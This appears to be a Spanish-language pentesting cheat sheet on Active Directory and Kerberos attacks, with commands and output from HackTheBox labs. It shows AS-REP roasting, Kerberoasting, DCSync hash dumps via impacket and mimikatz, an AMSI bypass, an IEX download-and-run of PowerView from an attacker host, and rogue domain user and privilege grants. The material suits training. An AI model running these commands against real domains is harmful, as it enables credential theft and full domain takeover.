AD Enumeration

Common Terminology

  • Ticket Granting Ticket (TGT) - A ticket-granting ticket is an authentication ticket used to request service tickets from the TGS for specific resources from the domain.

  • Key Distribution Center (KDC) - The Key Distribution Center is a service for issuing TGTs and service tickets that consist of the Authentication Service and the Ticket Granting Service.

  • Authentication Service (AS) - The Authentication Service issues TGTs to be used by the TGS in the domain to request access to other machines and service tickets.

  • Ticket Granting Service (TGS) - The Ticket Granting Service takes the TGT and returns a ticket to a machine on the domain.

  • Service Principal Name (SPN) - A Service Principal Name is an identifier given to a service instance to associate a service instance with a domain service account. Windows requires that services have a domain service account which is why a service needs an SPN set.

  • KDC Long Term Secret Key (KDC LT Key) - The KDC key is based on the KRBTGT service account. It is used to encrypt the TGT and sign the PAC.

  • Client Long Term Secret Key (Client LT Key) - The client key is based on the computer or service account. It is used to check the encrypted timestamp and encrypt the session key.

  • Service Long Term Secret Key (Service LT Key) - The service key is based on the service account. It is used to encrypt the service portion of the service ticket and sign the PAC.

  • Session Key - Issued by the KDC when a TGT is issued. The user will provide the session key to the KDC along with the TGT when requesting a service ticket.

  • Privilege Attribute Certificate (PAC) - The PAC holds all of the user's relevant information, it is sent along with the TGT to the KDC to be signed by the Target LT Key and the KDC LT Key in order to validate the user.

Attack Privilege Requirements

  • Kerbrute Enumeration - No domain access required

  • Pass the Ticket - Access as a user to the domain required

  • Kerberoasting - Access as any user required

  • AS-REP Roasting - Access as any user required

  • Golden Ticket - Full domain compromise (domain admin) required

  • Silver Ticket - Service hash required

  • Skeleton Key - Full domain compromise (domain admin) required

enum4linux 10.10.129.219

Guia completa de Crackmapexec

AS-REP Roasting

Por lo general, cuando intenta solicitar la autenticación a través de Kerberos, primero la parte solicitante debe autenticarse en el DC.

Pero hay una opción, DONT_REQ_PREAUTHdonde el DC simplemente enviará el hash a un usuario no autenticado. AS-REP Roasting está buscando si algún usuario conocido tiene esta opción configurada.

$ impacket-GetNPUsers egotistical-bank.local/ -no-pass -usersfile users-kerbrute
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:de15a92de8e4d862924076adb6e989db$d0dfc38.....
[-] User hsmith doesn't have UF_DONT_REQUIRE_PREAUTH set

Enumeración de usuarios en Kerberos

./kerbrute_linux_amd64 userenum --dc 10.10.10.175 -d egotistical-bank.local /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
cat kerbrute-users.txt | grep VALID | awk '{print $7}' > users-valid.txt

Obtener información del dominio LDAP

ldapsearch -x -h 10.10.10.175 -b 'DC=EGOTISTICAL-BANK,DC=LOCAL'
ldapsearch -x -h 10.10.10.111 -D 'svcorp2\alice' -w 'Password01' -b "DC=svcorp2,DC=com"

Filtros interesantes para la salida de LDAPSEARCH

cat data.resolute | grep -i password
cat data.resolute | grep sAMAccountName 

DCSync

$ impacket-secretsdump svc_loanmgr@10.10.10.111  
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

Password:
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::

##################################################
## Otra manera con Mimikatz
.\mimikatz.exe 'lsadump::dcsync /domain:egotistical-bank.local /user:Administrator' exit
  .#####.   mimikatz 2.2.0 (x86) #19041 Sep 18 2020 19:18:00
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # lsadump::dcsync /domain:egotistical-bank.local /user:Administrator
[DC] 'egotistical-bank.local' will be the domain
[DC] 'SAUNA.EGOTISTICAL-BANK.LOCAL' will be the DC server
[DC] 'Administrator' will be the user account

Object RDN           : Administrator

** SAM ACCOUNT **

SAM Username         : Administrator
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration   :
Password last change : 7/26/2021 8:16:16 AM
Object Security ID   : S-1-5-21-2966785786-3096785034-1186376766-500
Object Relative ID   : 500

Credentials:
  Hash NTLM: 823452073d75b9d1cf70ebdf86c7f98e
    ntlm- 0: 823452073d75b9d1cf70ebdf86c7f98e
    ntlm- 1: d9485863c1e9e05851aa40cbb4ab9dff
    ntlm- 2: 7facdc498ed1680c4fd1448319a8c04f
    lm  - 0: 365ca60e4aba3e9a71d78a3912caf35c
    lm  - 1: 7af65ae5e7103761ae828523c7713031

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
    Random Value : 716dbadeed0e537580d5f8fb28780d44
    
### EJEMPLO CON LA MAQUINA FOREST ###

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Bypass-4MSI
[+] Success!

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> IEX(New-Object Net.WebClient).downloadString('http://10.10.14.7/PowerView.ps1')
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net user gerh Password123! /add /domain
The command completed successfully.

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net localgroup "Remote Management Users" gerh /add
The command completed successfully.

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net group "Exchange Windows Permissions" gerh /add
The command completed successfully.

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $Cred = New-Object System.Management.Automation.PSCredential('htb\gerh', $SecPassword)
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Add-ObjectACL -PrincipalIdentity gerh -Credential $Cred -Rights DCSync

Enumeracion de usuarios con rpcclient

rpcclient -U "" -N  10.10.10.111
rpcclient $> querydominfo
    Domain:         HTB
    Server:
    Comment:
    Total Users:    105
    Total Groups:   0
    Total Aliases:  0
    Sequence No:    1
    Force Logoff:   -1
    Domain Server State:    0x1
    Server Role:    ROLE_DOMAIN_PDC
    Unknown 3:      0x1
rpcclient $> enumdomusers
    user:[Administrator] rid:[0x1f4]
    user:[Guest] rid:[0x1f5]
    user:[krbtgt] rid:[0x1f6]
    user:[sebastien] rid:[0x479]
    user:[lucinda] rid:[0x47a]
    user:[svc-alfresco] rid:[0x47b]
    user:[andy] rid:[0x47e]
    user:[mark] rid:[0x47f]
    user:[santi] rid:[0x480]
rpcclient $> enumdomgroups
    group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]          
    group:[Domain Admins] rid:[0x200]
    group:[Domain Users] rid:[0x201]
    group:[Domain Guests] rid:[0x202]
    group:[Domain Computers] rid:[0x203]
    group:[Domain Controllers] rid:[0x204]
    group:[$D31000-NSEL5BRJ63V7] rid:[0x46d]
    group:[Service Accounts] rid:[0x47c]
    group:[Privileged IT Accounts] rid:[0x47d]
    group:[test] rid:[0x13ed]
    
## Cambio de password con RPCCLIENT
rpcclient -U blackfield/support 10.10.10.192
Enter BLACKFIELD\support's password: 
rpcclient $> setuserinfo2 audit2020 23 'Hackeroso'
result: NT_STATUS_PASSWORD_RESTRICTION
result was NT_STATUS_PASSWORD_RESTRICTION
rpcclient $> setuserinfo audit2020 23 'Hackeroso'
result: NT_STATUS_PASSWORD_RESTRICTION
result was NT_STATUS_PASSWORD_RESTRICTION
rpcclient $> setuserinfo audit2020 23 'H@ckeros0'
rpcclient $> exit

## Obtener solo los usuarios validos gracias al RPCCLIENT
cat users.txt | awk -F\[ '{print $2}' | awk -F \] '{print $1}' | grep -v Guest > valid_users.txt
rpcclient -U "" -N 10.10.10.111 -c "enumdomusers" | grep -oP '\[.*?\]' | grep -v "0x" | tr -d '[]' > users

Escaneo con Nmap sobre LDAP

nmap -n -sV --script "ldap* and not brute" 10.10.10.111 -Pn

Rutas Interesantes

\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\

Instalacion de bloodhound-python

If you have domain credentials you can run a python bloodhound ingestor from any platform so you don't need to depend on Windows.
Download it from 
https://github.com/fox-it/BloodHound.py

systemctl restart docker
git clone https://github.com/fox-it/BloodHound.py.git
docker build -t bloodhound .
docker run -v ${PWD}:/bloodhound-data -it bloodhound

bloodhound-python -u alice -p Password01 -d svcorp.com -gc sv-dc01.svcorp.com -c all -ns 10.10.10.111

Impacket-GetUserSPNs

impacket-GetUserSPNs svcorp.com/alice -dc-ip 10.10.10.111 -outputfile hashes.kerberoast

Significado del hash aad3b435b51404eeaad3b435b51404ee

GetUserSPN.ps1

Get-TGSCipher.ps1

.\Get-TGSCipher.ps1 -SPN "MSSQLSvc/xor-app23.xor.com:1433" -Format John

Última actualización